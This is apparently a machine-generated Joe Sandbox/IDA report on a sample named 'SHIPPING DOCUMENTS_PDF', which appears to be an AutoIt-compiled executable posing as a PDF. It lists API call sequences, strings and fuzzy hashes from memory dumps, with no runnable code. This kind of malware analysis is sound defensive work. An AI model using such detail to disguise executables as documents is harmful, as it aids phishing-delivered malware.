                                                                                    • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                                                                    • String ID:
                                                                                    • API String ID: 3840717409-0
                                                                                    • Opcode ID: 1245a71c53b07b65e93383239f715b4b974795b4b0fb00406c41bd8764cfaa9e
                                                                                    • Instruction ID: c95c6f259702a9c0d6a156a3dc81a32e1da601c4369a7723254f8e9b69e49a66
                                                                                    • Opcode Fuzzy Hash: 1245a71c53b07b65e93383239f715b4b974795b4b0fb00406c41bd8764cfaa9e
                                                                                    • Instruction Fuzzy Hash: 65412975601205EFDB119F65DC98EBABBF9EF89711F1140AAF906D7260EB309A01CB60
                                                                                    APIs
                                                                                    • __wsplitpath.LIBCMT ref: 00BBDA10
                                                                                    • _wcscat.LIBCMT ref: 00BBDA28
                                                                                    • _wcscat.LIBCMT ref: 00BBDA3A
                                                                                    • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00BBDA4F
                                                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 00BBDA63
                                                                                    • GetFileAttributesW.KERNEL32(?), ref: 00BBDA7B
                                                                                    • SetFileAttributesW.KERNEL32(?,00000000), ref: 00BBDA95
                                                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 00BBDAA7
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: CurrentDirectory$AttributesFile_wcscat$__wsplitpath
                                                                                    • String ID: *.*
                                                                                    • API String ID: 34673085-438819550
                                                                                    • Opcode ID: 106260429551fab8da9ee1493d2a56478f144e64cc54b4cf4b9fff6c28253e67
                                                                                    • Instruction ID: cf91af45a1a93d5a68b0d444675c385baacad6c09f35e5315669da57870180a6
                                                                                    • Opcode Fuzzy Hash: 106260429551fab8da9ee1493d2a56478f144e64cc54b4cf4b9fff6c28253e67
                                                                                    • Instruction Fuzzy Hash: CA8191716042419FCB24DF64C884ABAB7E4EF89350F1888AEF8C9C7251F7B8D945CB52
                                                                                    APIs
                                                                                      • Part of subcall function 00B52612: GetWindowLongW.USER32(?,000000EB), ref: 00B52623
                                                                                    • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 00BDC1FC
                                                                                    • GetFocus.USER32 ref: 00BDC20C
                                                                                    • GetDlgCtrlID.USER32(00000000), ref: 00BDC217
                                                                                    • _memset.LIBCMT ref: 00BDC342
                                                                                    • GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 00BDC36D
                                                                                    • GetMenuItemCount.USER32(?), ref: 00BDC38D
                                                                                    • GetMenuItemID.USER32(?,00000000), ref: 00BDC3A0
                                                                                    • GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 00BDC3D4
                                                                                    • GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 00BDC41C
                                                                                    • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00BDC454
                                                                                    • DefDlgProcW.USER32(?,00000111,?,?,?,?,?,?,?), ref: 00BDC489
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow_memset
                                                                                    • String ID: 0
                                                                                    • API String ID: 1296962147-4108050209
                                                                                    • Opcode ID: 8b2f2d191edba688d5d8c79f553d8e0eb558ae61f903ca323cba247d364d1d32
                                                                                    • Instruction ID: 31e855e6206381a086eb85d674d5f8127d07a258baedea12ad1a081a48ec62b8
                                                                                    • Opcode Fuzzy Hash: 8b2f2d191edba688d5d8c79f553d8e0eb558ae61f903ca323cba247d364d1d32
                                                                                    • Instruction Fuzzy Hash: D6817B706093029FDB14CF14D894ABABBE8FF89714F0049AEF99597391EB30D905CB92
                                                                                    APIs
                                                                                    • GetDC.USER32(00000000), ref: 00BC738F
                                                                                    • CreateCompatibleBitmap.GDI32(00000000,00000007,?), ref: 00BC739B
                                                                                    • CreateCompatibleDC.GDI32(?), ref: 00BC73A7
                                                                                    • SelectObject.GDI32(00000000,?), ref: 00BC73B4
                                                                                    • StretchBlt.GDI32(00000006,00000000,00000000,00000007,?,?,?,?,00000007,?,00CC0020), ref: 00BC7408
                                                                                    • GetDIBits.GDI32(00000006,?,00000000,00000000,00000000,00000028,00000000), ref: 00BC7444
                                                                                    • GetDIBits.GDI32(00000006,?,00000000,?,00000000,00000028,00000000), ref: 00BC7468
                                                                                    • SelectObject.GDI32(00000006,?), ref: 00BC7470
                                                                                    • DeleteObject.GDI32(?), ref: 00BC7479
                                                                                    • DeleteDC.GDI32(00000006), ref: 00BC7480
                                                                                    • ReleaseDC.USER32(00000000,?), ref: 00BC748B
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                                                                                    • String ID: (
                                                                                    • API String ID: 2598888154-3887548279
                                                                                    • Opcode ID: bca092ae2519c38de840b6ec42556c341e721bc3da06a838a832f3ec38c1f804
                                                                                    • Instruction ID: 46845caf4d0fa697a80cafa5e186053ac74eaa7de45898e7778f28715931d982
                                                                                    • Opcode Fuzzy Hash: bca092ae2519c38de840b6ec42556c341e721bc3da06a838a832f3ec38c1f804
                                                                                    • Instruction Fuzzy Hash: BF513875904209EFCB14CFA8CC85EAEBBF9EF88310F14846EF95A97210DB31A941CB50
                                                                                    APIs
                                                                                      • Part of subcall function 00B70957: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,00B56B0C,?,00008000), ref: 00B70973
                                                                                      • Part of subcall function 00B54750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00B54743,?,?,00B537AE,?), ref: 00B54770
                                                                                    • SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00B56BAD
                                                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 00B56CFA
                                                                                      • Part of subcall function 00B5586D: _wcscpy.LIBCMT ref: 00B558A5
                                                                                      • Part of subcall function 00B7363D: _iswctype.LIBCMT ref: 00B73645
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: CurrentDirectory$FullNamePath_iswctype_wcscpy
                                                                                    • String ID: #include depth exceeded. Make sure there are no recursive includes$>>>AUTOIT SCRIPT<<<$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
                                                                                    • API String ID: 537147316-1018226102
                                                                                    • Opcode ID: 5e0a0237b3b0bf00bde181d53460d2d452d1dd223ef4b4ae03eba29edd0b3ff5
                                                                                    • Instruction ID: 48f2924056980deb8df32274284c739893681a648450438c65d1ecccc2c1434a
                                                                                    • Opcode Fuzzy Hash: 5e0a0237b3b0bf00bde181d53460d2d452d1dd223ef4b4ae03eba29edd0b3ff5
                                                                                    • Instruction Fuzzy Hash: A002BC301083419FC724EF24C891AAFBBF5EF99315F5048ADF89A972A1DB30D949CB52
                                                                                    APIs
                                                                                    • _memset.LIBCMT ref: 00BB2D50
                                                                                    • GetMenuItemInfoW.USER32(00000000,00000007,00000000,00000030), ref: 00BB2DDD
                                                                                    • GetMenuItemCount.USER32(00C15890), ref: 00BB2E66
                                                                                    • DeleteMenu.USER32(00C15890,00000005,00000000,000000F5,?,?), ref: 00BB2EF6
                                                                                    • DeleteMenu.USER32(00C15890,00000004,00000000), ref: 00BB2EFE
                                                                                    • DeleteMenu.USER32(00C15890,00000006,00000000), ref: 00BB2F06
                                                                                    • DeleteMenu.USER32(00C15890,00000003,00000000), ref: 00BB2F0E
                                                                                    • GetMenuItemCount.USER32(00C15890), ref: 00BB2F16
                                                                                    • SetMenuItemInfoW.USER32(00C15890,00000004,00000000,00000030), ref: 00BB2F4C
                                                                                    • GetCursorPos.USER32(?), ref: 00BB2F56
                                                                                    • SetForegroundWindow.USER32(00000000), ref: 00BB2F5F
                                                                                    • TrackPopupMenuEx.USER32(00C15890,00000000,?,00000000,00000000,00000000), ref: 00BB2F72
                                                                                    • PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 00BB2F7E
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: Menu$DeleteItem$CountInfo$CursorForegroundMessagePopupPostTrackWindow_memset
                                                                                    • String ID:
                                                                                    • API String ID: 3993528054-0
                                                                                    • Opcode ID: b4bf8cbb3901e52f328926ecdd00d1373943c0eb89c3e472cf72a14df6d951c6
                                                                                    • Instruction ID: f7cee4a5ac52c16bafa013b61ead7d4ba39a09e9ab43f47a0d457dbb64ce4044
                                                                                    • Opcode Fuzzy Hash: b4bf8cbb3901e52f328926ecdd00d1373943c0eb89c3e472cf72a14df6d951c6
                                                                                    • Instruction Fuzzy Hash: 1A71B270605206BFEB218F55DC85FFABFA4FB04764F1442A6F615AA1E1C7F19820DB90
                                                                                    APIs
                                                                                      • Part of subcall function 00B57BCC: _memmove.LIBCMT ref: 00B57C06
                                                                                    • _memset.LIBCMT ref: 00BA786B
                                                                                    • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 00BA78A0
                                                                                    • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 00BA78BC
                                                                                    • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 00BA78D8
                                                                                    • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 00BA7902
                                                                                    • CLSIDFromString.OLE32(?,?,?,SOFTWARE\Classes\), ref: 00BA792A
                                                                                    • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00BA7935
                                                                                    • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00BA793A
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_memmove_memset
                                                                                    • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                                                                                    • API String ID: 1411258926-22481851
                                                                                    • Opcode ID: 4fd64c908f2f3d81409540452cc68fcd46664a1bf9e941ee1e126fed5d441dd8
                                                                                    • Instruction ID: b3352783009413ffa112c7dfdfb65df3c599a1f6bcb94519007a0d58febbcccf
                                                                                    • Opcode Fuzzy Hash: 4fd64c908f2f3d81409540452cc68fcd46664a1bf9e941ee1e126fed5d441dd8
                                                                                    • Instruction Fuzzy Hash: 1B410A72D58229ABCF11EF94EC55EEEB7B8FF04351F0441AAE905A31A1EE345D09CB90
                                                                                    APIs
                                                                                    • CharUpperBuffW.USER32(?,?,?,?,?,?,?,00BCFDAD,?,?), ref: 00BD0E31
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: BuffCharUpper
                                                                                    • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                                                                                    • API String ID: 3964851224-909552448
                                                                                    • Opcode ID: 73712edc932037bea1afd37609174052d7130355a669af5b8f58b44f2d668af3
                                                                                    • Instruction ID: 0653afebd4caee8befe6c82a60b690ff1ecae0fd086444778eebc74616056b39
                                                                                    • Opcode Fuzzy Hash: 73712edc932037bea1afd37609174052d7130355a669af5b8f58b44f2d668af3
                                                                                    • Instruction Fuzzy Hash: 23414C7152424A8FCF14FF50D8A6BEE77A4EF21700F6444A6FC651B292EB309D1ACB60
APIs
• GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,00B8E2A0,00000010,?,Bad directive syntax error,00BDF910,00000000,?,?,?,>>>AUTOIT SCRIPT<<<), ref: 00BAF7C2
• LoadStringW.USER32(00000000,?,00B8E2A0,00000010), ref: 00BAF7C9
  • Part of subcall function 00B57DE1: _memmove.LIBCMT ref: 00B57E22
• _wprintf.LIBCMT ref: 00BAF7FC
• __swprintf.LIBCMT ref: 00BAF81E
• MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 00BAF88D
Memory Dump Source
• Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
• Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
Similarity
• API ID: HandleLoadMessageModuleString__swprintf_memmove_wprintf
• String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
• API String ID: 1506413516-4153970271
• Opcode ID: 6de06d3e79998b71ad12e7475d758b736d2212a3e433076d70b21fbdce69af66
• Instruction ID: 5ce6fa01ef5fc9aacdbc701e5832bb83bdd579261ec89f428a9663d04c978cc8
• Opcode Fuzzy Hash: 6de06d3e79998b71ad12e7475d758b736d2212a3e433076d70b21fbdce69af66
• Instruction Fuzzy Hash: BA218D3294421AEBCF12EF90CC5AEFE77B8FF18701F0444E6F915660A2EA319618DB50
APIs
  • Part of subcall function 00B57BCC: _memmove.LIBCMT ref: 00B57C06
  • Part of subcall function 00B57924: _memmove.LIBCMT ref: 00B579AD
• mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 00BB5330
• mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 00BB5346
• mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00BB5357
• mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 00BB5369
• mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 00BB537A
Similarity
• API ID: SendString$_memmove
• String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
• API String ID: 2279737902-1007645807
• Opcode ID: 3e851f5ca6a8c51067fd76acf6955e169313833c2095916bc788f9a8531ac1e7
• Instruction ID: 7aadb9e0a380cd0c097c76939a7d498d12ea00950aa355dbd11fc8a5da200257
• Opcode Fuzzy Hash: 3e851f5ca6a8c51067fd76acf6955e169313833c2095916bc788f9a8531ac1e7
• Instruction Fuzzy Hash: 9111C430A901297AD720B765DC4AEFFBBFCEB91B41F0004A9B802A20D1EEA00D08C5B5
APIs
Similarity
• API ID: _wcscpy$CleanupStartup_memmove_strcatgethostbynamegethostnameinet_ntoa
• String ID: 0.0.0.0
• API String ID: 208665112-3771769585
• Opcode ID: fcf2997a215c8f3f1c900b5db004feed5b04a1755441fe0c7c4159cc13fe61c0
• Instruction ID: fa115367fe49d0bda050ab425e4883147d5ef79e1b1d9c0bd7354b2e53211930
• Opcode Fuzzy Hash: fcf2997a215c8f3f1c900b5db004feed5b04a1755441fe0c7c4159cc13fe61c0
• Instruction Fuzzy Hash: 9611A135904115ABCB20AB319C46AFA77F8EB02711F0481F6F45A96192FFB18E81C651
APIs
• timeGetTime.WINMM ref: 00BB4F7A
  • Part of subcall function 00B7049F: timeGetTime.WINMM(?,75A8B400,00B60E7B), ref: 00B704A3
• Sleep.KERNEL32(0000000A), ref: 00BB4FA6
• EnumThreadWindows.USER32(?,Function_00064F28,00000000), ref: 00BB4FCA
• FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 00BB4FEC
• SetActiveWindow.USER32 ref: 00BB500B
• SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 00BB5019
• SendMessageW.USER32(00000010,00000000,00000000), ref: 00BB5038
• Sleep.KERNEL32(000000FA), ref: 00BB5043
• IsWindow.USER32 ref: 00BB504F
• EndDialog.USER32(00000000), ref: 00BB5060
Similarity
• API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
• String ID: BUTTON
• API String ID: 1194449130-3405671355
• Opcode ID: a111bc5987ae75a8e56d71c1e5f26328903b812669a82977be51f29a231ea622
• Instruction ID: cb036a3715abc8a16d30c101f69e75f99a370f297fc1303af68f826b578741fb
• Opcode Fuzzy Hash: a111bc5987ae75a8e56d71c1e5f26328903b812669a82977be51f29a231ea622
• Instruction Fuzzy Hash: 0421A47060A606BFE7206F20EC99BBA7BEAFB57745F049065F106831B1DFB18D00C662
APIs
  • Part of subcall function 00B59837: __itow.LIBCMT ref: 00B59862
  • Part of subcall function 00B59837: __swprintf.LIBCMT ref: 00B598AC
• CoInitialize.OLE32(00000000), ref: 00BBD5EA
• SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 00BBD67D
• SHGetDesktopFolder.SHELL32(?), ref: 00BBD691
• CoCreateInstance.OLE32(00BE2D7C,00000000,00000001,00C08C1C,?), ref: 00BBD6DD
• SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 00BBD74C
• CoTaskMemFree.OLE32(?,?), ref: 00BBD7A4
• _memset.LIBCMT ref: 00BBD7E1
• SHBrowseForFolderW.SHELL32(?), ref: 00BBD81D
• SHGetPathFromIDListW.SHELL32(00000000,?), ref: 00BBD840
• CoTaskMemFree.OLE32(00000000), ref: 00BBD847
• CoTaskMemFree.OLE32(00000000,00000001,00000000), ref: 00BBD87E
• CoUninitialize.OLE32(00000001,00000000), ref: 00BBD880
Similarity
• API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize__itow__swprintf_memset
• String ID:
• API String ID: 1246142700-0
• Opcode ID: 8c2225b27903635ff45f355fc42f7a88959ea7c6b09d52c14aeebf91529ab192
• Instruction ID: 91660e0d525a9f5140464eb1dc15583267e9ca1d5f502f3a0e23e90fca5e12a6
• Opcode Fuzzy Hash: 8c2225b27903635ff45f355fc42f7a88959ea7c6b09d52c14aeebf91529ab192
• Instruction Fuzzy Hash: 69B10B75A00109EFDB04DFA4C894EAEBBF9FF49304B1484A9E90ADB261DB74ED45CB50
APIs
• GetDlgItem.USER32(?,00000001), ref: 00BAC283
• GetWindowRect.USER32(00000000,?), ref: 00BAC295
• MoveWindow.USER32(00000001,0000000A,?,00000001,?,00000000), ref: 00BAC2F3
• GetDlgItem.USER32(?,00000002), ref: 00BAC2FE
• GetWindowRect.USER32(00000000,?), ref: 00BAC310
• MoveWindow.USER32(00000001,?,00000000,00000001,?,00000000), ref: 00BAC364
• GetDlgItem.USER32(?,000003E9), ref: 00BAC372
• GetWindowRect.USER32(00000000,?), ref: 00BAC383
• MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 00BAC3C6
• GetDlgItem.USER32(?,000003EA), ref: 00BAC3D4
• MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 00BAC3F1
• InvalidateRect.USER32(?,00000000,00000001), ref: 00BAC3FE
Similarity
• API ID: Window$ItemMoveRect$Invalidate
• String ID:
• API String ID: 3096461208-0
• Opcode ID: c49c7284b9fb677a9b5ef7c22569ccde396626488a8fa162fc298584f38ac0a2
• Instruction ID: b0c70ba9592c5390f16ff806ea708c348c804bac766d7e55a22683940cdced0b
• Opcode Fuzzy Hash: c49c7284b9fb677a9b5ef7c22569ccde396626488a8fa162fc298584f38ac0a2
• Instruction Fuzzy Hash: E2513E71B04205ABDF18CFA9DD99AAEBBF6EB88310F14816DF516D7290DB709D00CB10
APIs
  • Part of subcall function 00B51B41: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00B52036,?,00000000,?,?,?,?,00B516CB,00000000,?), ref: 00B51B9A
• DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 00B520D3
• KillTimer.USER32(-00000001,?,?,?,?,00B516CB,00000000,?,?,00B51AE2,?,?), ref: 00B5216E
• DestroyAcceleratorTable.USER32(00000000), ref: 00B8BCA6
• ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00B516CB,00000000,?,?,00B51AE2,?,?), ref: 00B8BCD7
• ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00B516CB,00000000,?,?,00B51AE2,?,?), ref: 00B8BCEE
• ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00B516CB,00000000,?,?,00B51AE2,?,?), ref: 00B8BD0A
• DeleteObject.GDI32(00000000), ref: 00B8BD1C
Similarity
• API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
• String ID:
• API String ID: 641708696-0
• Opcode ID: 472b4b7b58219ee97bbc7a65ae543fef088d5c45faf3503393708d40f4ab4e13
• Instruction ID: 3edb541e005aa92e5da77c03454b8b466efe1eb6407db80d947d56b7774dda68
• Opcode Fuzzy Hash: 472b4b7b58219ee97bbc7a65ae543fef088d5c45faf3503393708d40f4ab4e13
• Instruction Fuzzy Hash: 3161A131502A01DFDB35AF24D999B6AB7F1FF82312F1484E9E94257AB0C770A885DF90
APIs
  • Part of subcall function 00B525DB: GetWindowLongW.USER32(?,000000EB), ref: 00B525EC
• GetSysColor.USER32(0000000F), ref: 00B521D3
Similarity
• API ID: ColorLongWindow
• String ID:
• API String ID: 259745315-0
• Opcode ID: 230d07eab4574993594615829c7a7ae8e1e9c0fb853c6613399d7b56d516eb6b
• Instruction ID: da9e0770cee454b2aa1f6ca3cf508f0e0d2c0f77f83b7ee333b67642ebedd1a2
• Opcode Fuzzy Hash: 230d07eab4574993594615829c7a7ae8e1e9c0fb853c6613399d7b56d516eb6b
• Instruction Fuzzy Hash: BF41A335006540DEDB215F28EC98BB93BA5EB07322F1442E6FD659B1E1DB328C46DB11
                                                                                    APIs
                                                                                    • CharLowerBuffW.USER32(?,?,00BDF910), ref: 00BBA90B
                                                                                    • GetDriveTypeW.KERNEL32(00000061,00C089A0,00000061), ref: 00BBA9D5
                                                                                    • _wcscpy.LIBCMT ref: 00BBA9FF
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: BuffCharDriveLowerType_wcscpy
                                                                                    • String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
                                                                                    • API String ID: 2820617543-1000479233
                                                                                    • Opcode ID: ab0356434cebf759f7f86e7273152a03fa64e032a8d1fe669bb5861b04abe7d2
                                                                                    • Instruction ID: 1a3ec61e54c088f21d70bcd3b0b33f04df75c22ada0c9956bb5e894337afa009
